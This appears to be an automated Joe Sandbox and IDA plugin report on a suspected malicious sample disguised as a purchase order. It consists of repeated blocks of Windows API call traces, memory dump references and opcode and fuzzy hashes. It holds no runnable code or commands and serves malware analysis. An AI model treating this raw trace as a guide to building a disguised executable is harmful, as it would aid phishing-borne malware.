                                                    • _free.LIBCMT ref: 004170EE
                                                    • InterlockedIncrement.KERNEL32(00972CF8), ref: 00417106
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                    • String ID:
                                                    • API String ID: 3470314060-0
                                                    • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                    • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                    • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                    • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                      • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                    • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                    • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                    • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                    • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                    • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                    • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                    APIs
                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                    • __freefls@4.LIBCMT ref: 00415209
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                    • String ID:
                                                    • API String ID: 442100245-0
                                                    • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                    • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                    • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                    • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                    APIs
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                    • _wcslen.LIBCMT ref: 0045F94A
                                                    • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 621800784-4108050209
                                                    • Opcode ID: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                                    • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                    • Opcode Fuzzy Hash: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                                    • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • SetErrorMode.KERNEL32 ref: 004781CE
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                    • SetErrorMode.KERNEL32(?), ref: 00478270
                                                    • SetErrorMode.KERNEL32(?), ref: 00478340
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                    • String ID: \VH
                                                    • API String ID: 3884216118-234962358
                                                    • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                    • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                    • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                    • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                    • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                    • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: AU3_GetPluginDetails$v
                                                    • API String ID: 145871493-264927652
                                                    • Opcode ID: a732767565c191af3f32d00edcd54a30abdc686136f50d1932ac62ef5a53304e
                                                    • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                    • Opcode Fuzzy Hash: a732767565c191af3f32d00edcd54a30abdc686136f50d1932ac62ef5a53304e
                                                    • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                    • IsMenu.USER32(?), ref: 0044854D
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                    • DrawMenuBar.USER32 ref: 004485AF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert
                                                    • String ID: 0
                                                    • API String ID: 3076010158-4108050209
                                                    • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                    • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                    • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                    • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                    • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_memmove_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1589278365-1403004172
                                                    • Opcode ID: d3ab0c5c9dbd55cd2fa387b6395fab58cc4ff0dcf91f6c5d22d862eb4450cbb5
                                                    • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                    • Opcode Fuzzy Hash: d3ab0c5c9dbd55cd2fa387b6395fab58cc4ff0dcf91f6c5d22d862eb4450cbb5
                                                    • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Handle
                                                    • String ID: nul
                                                    • API String ID: 2519475695-2873401336
                                                    • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                    • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                    • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                    • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Handle
                                                    • String ID: nul
                                                    • API String ID: 2519475695-2873401336
                                                    • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                    • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                    • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                    • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: SysAnimate32
                                                    • API String ID: 0-1011021900
                                                    • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                    • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                    • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                    • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                      • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                      • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                      • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                    • GetFocus.USER32 ref: 0046157B
                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                    • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                    • __swprintf.LIBCMT ref: 00461608
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                    • String ID: %s%d
                                                    • API String ID: 2645982514-1110647743
                                                    • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                    • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                    • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                    • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                    • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                    • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                    • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                    • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
